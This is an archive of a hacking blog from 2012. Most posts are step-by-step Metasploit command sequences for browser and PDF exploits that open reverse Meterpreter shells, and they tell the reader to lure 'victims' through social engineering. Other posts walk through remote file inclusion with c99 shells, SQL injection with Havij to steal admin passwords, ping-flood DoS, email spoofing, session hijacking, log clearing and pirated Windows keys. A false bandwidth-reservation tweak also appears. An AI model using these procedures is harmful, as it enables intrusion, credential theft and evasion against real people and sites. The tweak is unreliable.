Saturday, September 29, 2012

How to Hack Windows 7 using Metaspolit

0 comments
The Metasploit Project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine.

Requirement


metasploit

Windows 7

Open terminal type

msfconsole

use auxiliary/server/browser_autopwn

show options


Now set LHOST, PORT and URIPATH

Msf auxiliary(browser_autppwn) > set lhost 192.168.1.4 (The IP address of your computer )

Msf auxiliary(browser_autppwn) > set port 4444 (The default port of your Metasploit program)

Msf auxiliary(browser_autppwn) > set uripath /

Msf auxiliary(browser_autppwn) > exploit (to launch a exploit on targeted machine)

Send the link of the server to the victim via chat or email or any social engineering technique.

You now have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack windows 7 PC using MS11_003 Internet Explorer Exploit

0 comments
This module exploits a memory corruption vulnerability within Microsoft’s HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 ‘mscorie.dll’ module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.

Exploit Targets


0 – Automatic (default)

1 – Internet Explorer 8

2 – Internet Explorer 7

3 – Internet Explorer 6

4 – Debug Target (Crash)

Requirement


Attacker: metasploit

Victim PC: Windows 7

Open terminal type

msfconsole

use exploit/windows/browser/ms11_003_ie_css_import

Msf exploit (ms11_003_ie_css_import)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms11_003_ie_css_import)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (ms11_003_ie_css_import)>set srvport 80 (The local port to listen on default: 8080)

Msf exploit (ms11_003_ie_css_import)>set uripath newhackingvideos (The Url to use for this exploit)

Msf exploit (ms11_003_ie_css_import)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (ms11_003_ie_css_import)>exploit


Now an URL you should give to your victim http://192.168.1.4/newhackingvideos.avi

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack Remote XP using Heap Overflow Attack

0 comments
This module exploits heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using the Windows Media Player ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than what is available on the heap (0×400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. Note: At this time, for IE 8 target, you may either choose the JRE ROP, or the msvcrt ROP to bypass DEP (Data Execution Prevention). Also, based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.

Exploit Targets


Windows XP service pack 2

Windows XP service pack 3

Requirement



Attacker: metasploit

Victim PC: Windows XP

Open backtrack terminal type

msfconsole


Now type

use exploit/windows/browser/ms12_004_midi

Msf exploit (ms12_004_midi)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms12_004_midi)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (ms12_004_midi)>set port 4444 (Port of Local PC)

Msf exploit (ms12_004_midi)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (ms12_004_midi)>set srvport 80 (The local port to listen on default: 8080)

Msf exploit (ms12_004_midi)>set uripath salesreport (The Url to use for this exploit)

Msf exploit (ms12_004_midi)>exploit


Now an URL you should give to your victim http://192.168.1.4/salesreport

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack Windows XP using Shell Link Code Execution

0 comments
This module exploits vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.
Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

Requirement


Attacker:metasploit

Victim PC: Windows XP

Open terminal type

msfconsole

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Msf exploit(ms10_046_shortcut_icon_dllloader)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms10_046_shortcut_icon_dllloader)>set lhost 192.168.1.6(IP of Local Host)

Msf exploit (ms10_046_shortcut_icon_dllloader)>set srvhost 192.168.1.6(This must be an address on the local machine)

Msf exploit (ms10_046_shortcut_icon_dllloader)>set uripath /(The Url to use for this exploit)

Msf exploit (ms10_046_shortcut_icon_dllloader)>exploit

Now an URL you should give to your victim http://192.168.1.6/

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack Remote PC with Operation Aurora Attack

0 comments
Operation Aurora was a cyber attack which began in mid-2009 and continued through December 2009. The attack was first publicly disclosed by Google on January 12, 2010, in a blog post. In the blog post, Google said the attack originated in China. The attacks were both sophisticated and well resourced and consistent with an advanced persistent threat attack.

The attack has been aimed at dozens of other organizations, of whichAdobe Systems, Juniper NetworksandRackspacehave publicly confirmed that they were targeted. According to media reports,Yahoo,Symantec, Northrop Grumman, MorganStanley and DowChemicalwere also among the targets.

Exploit Targets

Web Browser: Internet Explorer 5, Internet Explorer 6, Internet Explorer 7, Internet Explorer 8

Operating System: Windows vista, windows 7, windows server 2008

Requirement


Attacker:metasploit

Victim PC: Windows XP

Open terminal type

msfconsole

use exploit/windows/browser/ms10_002_aurora

Msf exploit(ms10_002_aurora)>set payload windows/meterpreter/reverse_tcp

Msf exploit (ms10_002_aurora)>set lhost 192.168.1.4(IP of Local Host)

Msf exploit (ms10_002_aurora)>set srvhost 192.168.1.4(This must be an address on the local machine)

Msf exploit (ms10_002_aurora)>set uripathmeeting(The Url to use for this exploit)

Msf exploit (ms10_002_aurora)>exploit

Now an URL you should give to your victim http://192.168.1.4/meeting

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack any Remote PC with Adobe JBIG2Decode Heap Corruption Exploit

0 comments
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon JavaScript for the heap spray.
Exploit Targets

0 – Adobe Reader v9.0.0 (Windows XP SP3 English) (default)

1 – Adobe Reader v8.1.2 (Windows XP SP2 English)

Requirement


Attacker:metasploit

Victim PC: Windows XP

Open terminal type

msfconsole

use exploit/windows/browser/adobe_jbig2decode

Msf exploit(adobe_jbig2decode)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_jbig2decode)>set lhost 192.168.1.4(IP of Local Host)

Msf exploit (adobe_jbig2decode)>set srvhost 192.168.1.4(This must be an address on the local machine)

Msf exploit (adobe_jbig2decode)>set uripathakonsong(The Url to use for this exploit)

Msf exploit (adobe_jbig2decode)>exploit

Now an URL you should give to your victimhttp://192.168.1.4:8080/akonsong
 
When the victim opens that link in their browser, immediately it will alert a dialog box about akonsong PDF .

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack remote PC using Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow

0 comments
This module exploits vulnerability in the Smart Independent Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version is assumed to be vulnerable as well.

Exploit Targets

0 – Automatic (default)

Requirement

Victim PC: Windows XP

Open backtrack terminal type

msfconsole

use exploit/windows/browser/adobe_cooltype_sing

Msf exploit(adobe_cooltype_sing)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_cooltype_sing)>set lhost 192.168.1.3(IP of Local Host)

Msf exploit (adobe_cooltype_sing)>set srvhost 192.168.1.3(This must be an address on the local machine)

Msf exploit (adobe_cooltype_sing)>set uripathfinalreport(The Url to use for this exploit)

Msf exploit (adobe_cooltype_sing)>exploit

Now an URL you should give to your victim http://192.168.1.3/finalreport

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

Hack Remote PC using Sun Java Command Line Injection

0 comments
Sun Java Web Start Plugin Command Line Argument Injection

This module exploits a flaw in the Web Start component of the Sun Java Runtime Environment. The arguments passed to Java Web Start are not properly validated, allowing injection of arbitrary arguments to the JVM. By utilizing the lesser known -J option, an attacker can take advantage of the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method allows an attacker to execute arbitrary code in the context of an unsuspecting browser user. In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the Web Client service (WebDAV Mini-Redirector) enabled

Exploit Targets

0 – Automatic (default)

1 – Java Runtime on Windows x86

Requirement

Attacker: metasploit

Victim PC: Windows XP

Open backtrack terminal type

msfconsole

use exploit/windows/browser/java_ws_vmargs

Msf exploit(java_ws_vmargs)>set payload windows/meterpreter/reverse_tcp

Msf exploit (java_ws_vmargs)>set lhost 192.168.1.3(IP of Local Host)

Msf exploit (java_ws_vmargs)>set srvhost 192.168.1.3(This must be an address on the local machine)

Msf exploit (java_ws_vmargs)>set srvport 80

Msf exploit (java_ws_vmargs)>set uripath /(The Url to use for this exploit)

Msf exploit (java_ws_vmargs)>exploit

Now an URL you should give to your victim http://192.168.1.3/

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“

How to Hack Remote PC using pdf

0 comments
Adobe FlateDecode Stream Predictor 02 Integer Overflow

This module exploits integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.
Exploit Targets

0 – Adobe Reader Windows Universal (JS Heap Spray) (default)
Requirement

Attacker: metasploit

Victim PC: Windows XP

Open terminal type

msfconsole

use exploit/windows/fileformat/adobe_flatedecode_predictor02

Msf exploit(adobe_flatedecode_predictor02)>set payload windows/meterpreter/reverse_tcp

Msf exploit(adobe_flatedecode_predictor02)>show options

Msf exploit (adobe_flatedecode_predictor02)>set lhost 192.168.1.3 (IP of Local Host)

Msf exploit (adobe_flatedecode_predictor02)>set filename attack.pdf

Msf exploit (adobe_flatedecode_predictor02)>exploit

After we successfully generate the malicious PDF, it will stored on your local computer

/root/.msf4/local/attack.pdf

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.3

exploit

Now send yourattack.pdffiles to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer

Redirect Site to Another Site

0 comments

A simple text file edit makes sites redirect to another. When you type address in address bar in any browser and enter it then it will display another web page, for example:- when you type Google.com you will be redirected to yahoo.com

Instructions to do:

1) Go to this directory [c:\windows\system32\drivers\etc], directory may change according to drive used for os installation
2) then hit enter
3) find a file named "hosts"
4) Right click on it and open with word pad.
5) In the last link of the document type the IP* address of yahoo space www.Google.com (Vice versa for other sites)
6) now save it
7) restart the browser if its already running
8) Now try it, It works perfect

IP*: to find IP address of that website Goto start ->Run > type cmd > enter. Now you have a new window on desktop. On that type this without cotes "ping www. yahoo.com"
replace yahoo.com with your preferred site and then enter it

How to Do Remote File Inclusion?

0 comments
Remote File Inclusion (RFI)occurs when a remote file, usually a shell(a graphical interface for browsing remote files and running your own code on a server), is included into a website which allows the hacker to execute server side commands as the current logged on user, and have access to files on the server. With this power the hacker can continue on to use local exploits to escalate his privileges and take over the whole system.

Many servers are vulnerable to this kind of attack because of PHP’s  default settings of register_globals and allow_url_fopen being enabled. Although as of PHP 6.0, register_globals has been depreciated and removed, many websites still rely on older versions of PHP to run their webapplications. Now let’s go through the steps a hacker would take to exploit this type of vulnerability in a website..


1.First the hacker would find a website that gets its pages via the PHP include() function and is vulnerable to RFI. Many hackers us Google dorks to locate servers vulnerable to RFI. A Google dork i the act of using Google’s provided search tools to help get a specific search result.

2.Website that include pages have a navigation system similar to:
http://target-site.com/index.php?page=PageName

3.To see if a the page is vulnerable, the hacker would try to include a site instead of PageName like the following:
http://target-site.com/index.php?page=http://google.com

4.If the Google homepage shows up on the website, then the hacker knows the website is vulnerable and would continue to include a shell.

5.A couple of the most popular shells are c99 and r57. A hacker would either upload them to a remote server or just use a Google dork to locate them already online and insert them. To find the a shell the hacker would search Google for: inurl:c99.txt. This will
display many websites with the shell already up and ready to be included. At the end of the URL make sure to add a ? so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems. The new URL with the shell included would look like:

http://target-site.com/index.php?page=http://site.com/c99.txt?

6.Sometimes the PHP script on the server appends “.php” to the end of every included file. So if you included the shell, it would end up looking like “c99.txt.php” and not work. To get around this, you would add a null byte () to the end of c99.txt. This tells the server to ignore everything after c99.txt.

7.In step one, I told you that hackers use Google dorks to look for sites possibly vulnerable to RFIs. An example of a Google dorkwould be: allinurl:.php?page=. This looks for URL’s with .php?page=in them. This is only an example and you most likely won’t find any vulnerable sites with that search. You can try
switching around the word “page” with other letters and similar words. Hackers usually search vulnerability databases like www.milw0rm.comfor already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork.

8.If the hacker succeeds in getting the server to parse the shell, he will be presented with a screen similar to the following:

The shell will display information about the remote server and list all the files and directories on it. From here the hacker would find a directory that has read and write privileges and upload the shell butthis time as a .php file so that incase the vulnerability is fixed, he will be able to access it later on.

RFi-tutorial

9. The hacker would next find a way to gain root privileges on the system. He can do this by uploading and running local exploits against the server. He could also search the victim server for configuration files. These files may contain username and passwords for the MYSQL databases and such.

To protect yourself from RFI attacks, simply make sure you are using up-to-date scripts, and make sure you server php.ini file has register_globals and allow_url_fopen disabled.

Friday, September 28, 2012

DOS ATTACK ON WEBSITE.

0 comments

DOWNLOAD TOOL FROM HERE.
ALTHOUGH IT SHOW THAT FILE IS VIRUS INFECTED ,BUT IT`S NOT.
PLACE I.P ADDRESS OR DOMAIN NAME OF THE WEBSITE &PRESS ENTER.

OR YOU CAN DO IT MANUALLY ALSO. JUST OPEN CMD & TYPE COMMAND.BUT IT`S OLD METHOD , SO I RECOMMEND YOU TO USE TOOL.

ping (Ip Address) -t -l 65000

IF YOU WANT TO KNOW MORE ABOUT IT. PLEASE READ FOLLOWING DOCUMENT.
IT HAS EXPLAINED EVERYTHING. CLICK HERE.

Wednesday, September 26, 2012

How to Find i.p Address of Remote computer?

0 comments


This is the article about getting the IP address of the remote computer i.e in terms of hacking getting the IP address of the victim computer.
Before proceeding lets know something about IP address.

0x01-What is IP address?
IP address means Internet Protocol address - An Internet Protocol address (IP address) is a numerical label assigned to each device (e.g., computer, printer etc.) participating in a computer network that uses the Internet Protocol for communication.
IP address serves for two basic purposes:
1. Host or network interface identification
2. Location Addressing

Tuesday, September 25, 2012

Using nmap to change a source address

0 comments
Using nmap to change a source address. The commands used are:
nmap -iflist
...to get a list of available interfaces. When an interface is chosen (in this tutorial, eth0 is chosen) use the name of the interface in the next command:
nmap -e eth0 -S 192.168.1.100 192.168.1.109
...which will use the eth0 interface and spoof a source IP of 192.168.1.100, while scanning 192.168.1.109. Because the source address is spoofed, the return traffic from the target host will not be routed back to us. Thus, all ports will appear to be closed.



How To change your I.P address?

2 comments
Before you can change your IP you need some information. This information includes your IP range, subnet mask, default gateway, dhcp server, and dns servers.


1. Getting your IP range - Getting information about your IP range is not difficult, I recommend using Neo Trace on your own IP. But for my test just look at your IP address, say it's 24.193.110.13 you can definitely use the IP's found between 24.193.110.1 < [new IP] < 24.193.110.255, don't use x.x.x.1 or x.x.x.255. To find your IP simply open a dos/command prompt window and type ipconfig at the prompt, look for "IP Address. . . . . . . . . . . . : x.x.x.x".

2. Subnet Mask, Default Gateway, DHCP Server - These are very easy to find, just open a dos/command prompt window and type 'ipconfig /all' without the ' '. You should see something like this:
Windows IP Configuration:

Monday, September 24, 2012

how to install metasploit in ubuntu?

0 comments

(1)First download metasploit latest version from here for linux.

(2)next step is move this downloaded file into your home folder. we want to convert run file into executable file. so run following command into your terminal.

(3) sudo chmod +x metasploit-latest-linux-installer.run

(4)sudo ./metasploit-latest-linux-installer.run
after that uncompress process will start &  it will install automatically.
follow some basic step & get activaton code.
open terminal & run following command

(5)msfconcole 
it will show
msf>


Friday, September 21, 2012

List of Useful Hacking Tools

0 comments

Here i am listing some good hacking free software which is very useful to hack any system.Download from  HERE.

(1)NESSUS-Nessus is one of the most popular and capable vulnerability scanners, particularly for UNIX systems. It was initially free and open source, but they closed the source code in 2005 and removed the free "Registered Feed" version in 2008. It now costs $1,200 per year, which still beats many of its competitors. A free “Home Feed” is also available, though it is limited and only licensed for home network use.

Nessus is constantly updated, with more than 46,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a web-based interface, and an embedded scripting language for writing your own plugins or understanding the existing ones. The open-source version of Nessus was forked by a group of users who still develop it under the OpenVAS name.

What is TELNET ? & How to Use TELNET?

0 comments

Telnet: the Number One Hacker Tool

In this Guide you will learn:
·         What is telnet?
·         How to telnet
·         How to get telnet accounts <begin11c.shtml>
·         Why you might not want to telnet <begin11c.shtml>
·         How to install a telnet server on your home Windows computer <begin11c.shtml>
·         How to turn off a telnet server on your home Linux computer <begin11d.shtml>
·         How to explore computers using telnet <begin11d.shtml>
·         Why not use a portscanner instead? <begin11f.shtml>
·         How to break into web sites using telnet <begin11f.shtml>
"Where do I type that command?" People ask that all the time when they read my early Guides to (mostly) Harmless Hacking. I wrote those guides back when the Internet was in its infancy and almost everyone in cyberspace used telnet. However, nowadays you might never even hear about telnet, much less use it, unless you are a hacker. So if you are still wondering about telnet, today is your lucky day.

Domain Hijacking – How to Hijack a Domain

0 comments


Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).

The operation of domain name is as follows
Any website say for example gohacking.com consists of two parts. The domain name(gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.

How to Spoof an Email Addresses?

0 comments
If you want to send email from your friend`s email address then you can use following services. keep in mind that it`s not actually send email from your friend`s mail address ,but the person who receive email  see your friend`s email address in sender

www.hoaxmail.co.uk

anonymailer.net 

emkei.cz

Above all emkei.cz  is my favourite because it provide some advance option like email-header, reply to,cc etc.

You can also send from your cmd ,but for that purpose you need S.M.T.P server name  of your I.S.P. so use above services only for fun .

Friday, September 14, 2012

BSNL search & Reliance Mobile search

0 comments
If you want to inquiry about any BSNL residential number, then it`s link below
http://dq.wdc.bsnl.co.in/bsnl-web/residentialSearch.seam

And if you want to know about details of any reliance number, there is below link.But unfortunately it is provide now only surname or First name.

http://myservices.relianceada.com/captureInstantRecharge.do

IP and Port scanning using ‘nmap (Network Mapper)’ in Ubuntu

0 comments
Nmap is a powerful scanner available in Unix/Linux system. It’s very usefull for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine again single hosts.

It’s very easy to install nmap in Ubuntu, just download from the internet.

sudo apt-get install nmap

In this practice, I used 2 computer.

PC-01, IP = 192.168.0.3 (OpenSuse 10.1) with Kernel 2.6.16.13-4-default


PC-02, IP = 192.168.0.2 (Ubuntu Feisty)


I run nmap from Ubuntu to scan PC-01.

IP Scanning with range 192.168.0.0 – 192.168.0.255sudo nmap -sP 192.168.0.0/24
Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 21:51 WIT

Host 192.168.0.2 appears to be up.

caught SIGINT signal, cleaning up



IP Scanning with range 192.168.0.1 – 192.168.0.254

sudo nmap -sP 192.168.0.1-254


Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 21:53 WIT

Host 192.168.0.2 appears to be up.

Host 192.168.0.3 appears to be up.

MAC Address: 00:0D:88:B3:72:F3 (D-Link)

Nmap finished: 255 IP addresses (2 hosts up) scanned in 31.242 seconds


Port Scanning with range port 100 – port 139

sudo nmap 192.168.0.3 -p100-139


Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 22:06 WIT

Interesting ports on 192.168.0.3:

Not shown: 38 filtered ports

PORT STATE SERVICE

113/tcp closed auth

139/tcp open netbios-ssn

Nmap finished: 1 IP address (1 host up) scanned in 24.914 seconds


For 40 ports, it took almost 25 seconds, so it will take much longer if you want to scan from 1-65535 (all ports in a computers).

Scanning Operating system on target IP

sudo nmap -O 192.168.0.3


Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 22:20 WIT

Interesting ports on 192.168.0.3:

Not shown: 1693 filtered ports

PORT STATE SERVICE

80/tcp open http

113/tcp closed auth

139/tcp open netbios-ssn

445/tcp open microsoft-ds

MAC Address: 00:0D:88:B3:72:F3 (D-Link)

Device type: general purpose|specialized|WAP|storage-misc

Running (JUST GUESSING):Linux 2.6.X|2.4.X (97%), Atmel Linux 2.6.X (91%), Siemens linux (91%), Linksys Linux 2.4.X (89%), Asus Linux 2.4.X (89%), Maxtor Linux 2.4.X (89%), Inventel embedded (88%)

Aggressive OS guesses: Linux 2.6.13 – 2.6.18 (97%), Linux 2.6.11 – 2.6.15 (Ubuntu or Debian) (93%), Linux 2.6.14 – 2.6.17 (92%), Linux 2.6.17 – 2.6.18 (x86) (92%), Linux 2.6.17.9 (X86) (92%), Linux 2.6.15-27-686 (Ubuntu Dapper, X86) (92%), Linux 2.6.9-42.0.2.EL (RedHat Enterprise Linux) (92%), Linux 2.6.9 – 2.6.12 (x86) (92%), Atmel AVR32 STK1000 development board (runs Linux 2.6.16.11) (91%), Siemens Gigaset SE515dsl wireless broadband router (91%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .

Nmap finished: 1 IP address (1 host up) scanned in94.942 seconds

nmap Faster Execution


If you want to make faster scan, use-T4option on nmap command..

$sudo nmap -A -T4 192.168.0.3


Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 22:42 WIT

Interesting ports on 192.168.0.3:

Not shown: 1693 filtered ports

PORT STATE SERVICE VERSION

80/tcp open http Apache httpd 2.2.0 ((Linux/SUSE))

113/tcp closed auth

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: HOME)

445/tcp open netbios-ssn Samba smbd 3.X (workgroup: HOME)

MAC Address: 00:0D:88:B3:72:F3 (D-Link)

Device type: general purpose|WAP|specialized|storage-misc|broadband router

Running (JUST GUESSING) : Linux 2.6.X|2.4.X (97%), Siemens linux (93%), Atmel Linux 2.6.X (92%), Inventel embedded (89%), Linksys Linux 2.4.X (89%), Asus Linux 2.4.X (89%), Maxtor Linux 2.4.X (89%), Netgear embedded (87%)

Aggressive OS guesses: Linux 2.6.13 – 2.6.18 (97%), Siemens Gigaset SE515dsl wireless broadband router (93%), Linux 2.6.11 – 2.6.15 (Ubuntu or Debian) (93%), Linux 2.6.15-27-686 (Ubuntu Dapper, X86) (93%), Atmel AVR32 STK1000 development board (runs Linux 2.6.16.11) (92%), Linux 2.6.14 – 2.6.17 (92%), Linux 2.6.17 – 2.6.18 (x86) (92%), Linux 2.6.17.9 (X86) (92%), Linux 2.6.9-42.0.2.EL (RedHat Enterprise Linux) (92%), Linux 2.6.9 – 2.6.12 (x86) (92%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .

Nmap finished: 1 IP address (1 host up) scanned in 58.830 seconds

How to install Nmap 6.01 in Ubuntu from source?

0 comments

1. Make sure you have bzip2 and g++installed. If not, tou can install them using the command
      sudo apt-get install bzip2 g++

2.Download nmap6.01 in any location of your choice. In this example we are going to assume that it is downloaded in ~/Downloads.

Sunday, September 9, 2012

Online Hash Crackers

2 comments
Cracker Hashes
Tobtu50,529,455,839
TMTO36,436,233,567
MD5Decrypter(uk)8,700,000,000
OnlineHashCrack5,211,644,250
AuthSecu500,000,000

Saturday, September 8, 2012

how to clear log & become anonimous ?

1 comments
Guyzz this is nt my tut but i wud like to share it coz its very important frall of us!!
Okay, let's begin!

1) How hackers get caught.

- First stuff that gives you away are "
LOGS".
You need to know how events, application, and system logs work. If you dont, you can be easily caught!
The shell history will expose your actions.
Another giveaway is leaving a “:wq” in /var/log/messages or binarys.

google hack trick

4 comments
Ok today i will show google hack demostration you'v never seen
before.
You will never find these fucking google hack codes on internet.
just watch and learn what i have discovered!!!

Ok it's time to show the secrets.

and this is the best google hack codes.

Saturday, September 1, 2012

Speed of your bandwidh(internet speed)

1 comments
Windows uses 20% of your bandwidth Here's how to Get it back

A nice little tweak for XP. Microsoft reserve 20% of your available bandwidth for their own purposes (suspect for updates and interrogating your machine etc..)

Here's how to get it back:

Click Start-->Run-->type "gpedit.msc" without the "

This opens the group policy editor. Then go to:

Local Computer Policy-->Computer Configuration-->Administrative Templates-->Network-->QOS Packet Scheduler-->Limit Reservable Bandwidth

Double click on Limit Reservable bandwidth. It will say it is not configured, but the truth is under the 'Explain' tab :

"By default, the Packet Scheduler limits the system to 20 percent of the bandwidth of a connection, but you can use this setting to override the default."

So the trick is to ENABLE reservable bandwidth, then set it to ZERO.

This will allow the system to reserve nothing, rather than the default 20%.

Top 20 terminal command of ubuntu

3 comments
1. Kill a running application by its name

killall [app_name]

2. Display disk space usage:

df –h

3. Locate the installation directories of a program:

whereis [app]

How to change login screen of ubuntu 10.10?

0 comments
Here is a way to change the looks of your login screen, it allows you to change the background, fonts and GTK theme using the Appearance Manager.

First open a Terminal window (Applications -> Accessories -> Terminal) then copy+paste the following line:

sudo cp /usr/share/applications/gnome-appearance-properties.desktop /usr/share/gdm/autostart/LoginWindow

Now close the Terminal window and logout, when logged out the Appearance window pops up. Here you can make the changes you want and when your done you can login as usual. To prevent the Appearance Manager from opening when you login, open a Terminal window (Applications -> Accessories -> Terminal) then copy+paste the following line:

sudo unlink /usr/share/gdm/autostart/LoginWindow/gnome-appearance-properties.desktop

USE NOKIA MOBILE AS MODEM IN UBUNTU

0 comments
1 ) Connect Phone with USB, select PC Suite Mode on phone (even though you are not using PC suite as that is windows only).
2) Open Network Manager on Ubuntu, should show entry for mobile broadband.
3) Select Mobile broadband entry and use wizard to select details for network (i used AIRTEL)
4) Should now be able to select entry and connect to internet from network manager.

Windows-7 genuine key

0 comments
22TKD-F8XX6-YG69F-9M66D-PMJBM
TWMF7-M387V-XKW4Y-PVQQD-RK7C8
HTJK6-DXX8T-TVCR6-KDG67-97J8Q
D4F6K-QK3RD-TMVMJ-BBMRX-3MBMV

1.Insert Windows 7 disc

2. then open the disc and open source folder, and then open product.ini or search for product.ini in the disc.

3.you can now use these keys seen in the notepad.

FIRESHEEP TUTORIAL(HTTP SESSION HIJACKING)

0 comments
Firesheep a Firefox addon has recently become very popular for easily carrying out a HTTP session hijacking attack. Http session hijacking attack can't be considered as a very sophisticated attack but needs some technical knowlegde to be performed . But Firesheep makes the attack a child's play. Firesheep was developed by Eric butler for Firefox, it was released at Toorcon 12 to demonstrate how serious cookie stealing can be.

Hacking website using SQL Injection -step by step guide

0 comments
Before we see what  SQL Injection is. We should know what SQL and Database are.

Database:


Database is collection of data. In website point of view, database is used for storing user ids,passwords,web page details and more.

Some List of Database are:

* DB servers,

* MySQL(Open source),

* MSSQL,

* MS-ACCESS,

* Oracle,

* Postgre SQL(open source),

* SQLite,

SQL:


Structured Query Language is Known as SQL. In order to communicate with the Database ,we are using SQL query. We are querying the database so it is called as Query language.

Definition from Complete reference:


SQL is a tool for organizing, managing, and retrieving data stored by a computer database. The name "SQL" is an abbreviation for Structured Query Language.

For historical reasons, SQL is usually pronounced "sequel," but the alternate pronunciation "S.Q.L." is also used. As the name implies, SQL is a computer language that you use to interact with a database. In fact, SQL works with one specific type of database, called a relational database.

Simple Basic Queries for SQL:


Select * from table_name :

this statement is used for showing the content of tables including column name.

For eg:

select * from users;

Insert into table_name(column_names,...) values(corresponding values for columns):

For inserting data to table.

For eg:

insert into users(username,userid) values("TheSec","break");

What is SQL Injection?


SQL injection is Common and famous method of hacking at present . Using this method an unauthorized person can access the database of the website. Attacker can get all details from the Database.

What an attacker can do?

* ByPassing Logins

* Accessing secret data

* Modifying contents of website

* Shutting down the My SQL server

Now let's dive into the real procedure for the SQL Injection.
 

 Steps.


Finding Vulnerable Website:

Our best partner for SQL injection is Google. We can find the Vulnerable websites(hackable websites) using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. There is lot of tricks to search in google. But we are going to use "inurl:" command for finding the vulnerable websites.

Some Examples:

inurl:index.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:pageid=

Here is the huge list of Google Dork

http://www.4shared.com/file/lzdEULnW/new_file.html

How to use?

Copy one of the above command and paste in the google search engine box.

Hit enter.

You can get list of web sites.

We have to visit the websites one by one for checking the vulnerability.

So Start from the first website.

- After finding the vulnerable website open Havij, lets say the vulnerable site has

URL:- “http://website.com/index.php?module=pages&id=85”

- If you get error then site is vulnerable to S.Q.L. injection attack .

-Download havij from here.

- After opening Havij paste the above URL like this i-e of vulnerable Site:-

- After that hit “Analyze” and thus it will scan site that whether sql injection is possible or not.

- It will tell you the type of server and also the type of OS running on the server and will give a message like :- Target Vulnerable  if the site is vulnerable.

Now go to “Tables” and “Get Database” and after getting data bases check all of them and hit “Get Tables” After getting tables of DB’s , select the admin table and hit “Get Columns” , after getting columns now a hacker can check the password and username column and can hit “Get Data”.

Now a You will get data in encrypted form , like mostly in “md5 hash” but we can decrypt it easily by using havij or other online tools present, After decrypting md5 , you have to find “admin page” using havij, find the buttons for decrypting md5 and finding admin page, Point the browser to the admin page, where you have to put the decrypted “password” and “username” of the admin to login into the website.

